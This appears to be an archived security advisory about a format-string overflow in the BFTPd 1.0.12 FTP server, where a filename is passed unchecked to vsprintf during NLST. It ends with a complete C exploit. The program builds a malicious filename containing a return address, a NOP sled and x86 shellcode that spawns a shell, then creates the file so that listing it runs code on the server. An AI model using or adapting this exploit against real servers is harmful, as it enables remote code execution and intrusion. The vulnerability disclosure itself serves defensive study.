|
|
|
|
| |
| BFTPd is a Linux FTP server with chroot and setreuid functionality. The latest version of BFTP has a potential security problem when the NSLT command is requested to list a file that contains a formatting string. The vulnerability allows remote attackers to overflow internal buffers, and execute arbitrary code. |
| |
Credit:
The information has been provided by asynchro.
|
| |
Vulnerable systems:
BFTPd 1.0.12
There is a malformed call to vsprintf in BFTPd. The relevant vulnerable function is sendstrf:
int sendstrf(int s, char *format, ...) {
....
vsprintf(buffer, format, val);
When the function is called from an NLIST command, it is incorrectly allowed to supply formatting string to the vsprintf:
else
foo = 1;
sendstrf(s, entry->d_name);
}
This can be used to overflow the buffer of the vsprintf and execute arbitrary code.
Exploit:
/*
Creates a filname to exploit the bug in bftpd 1.0.12
Create the file, cwd in the shell directory and nlist the file directory
(sh is executed in the working dir because it is not possible to insert a / in
the filename)
hints by |CyRaX| & Cthulhu
coded by asynchro
www.pkcrew.org
*/
#include <stdlib.h>
#include <unistd.h>
#define BUFSIZE 512
#define NOP 124
main()
{
int i;
char *buff;
char nop=0x90;
char addr[]="\xd4\xf9\xff\xbf";
char command[]="touch %.260x";
char shellcode[]=
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xffsh";
buff=(char *) malloc(BUFSIZE);
memset(buff,0x0,BUFSIZE);
memcpy(buff,command,sizeof(command));
strncat(buff,addr,4);
strncat(buff,addr,4);
for(i=0; i < NOP ;i++)
{
strncat(buff,&nop,1);
}
strncat(buff,shellcode,strlen(shellcode));
system(buff);
}
|
|
|
|
|
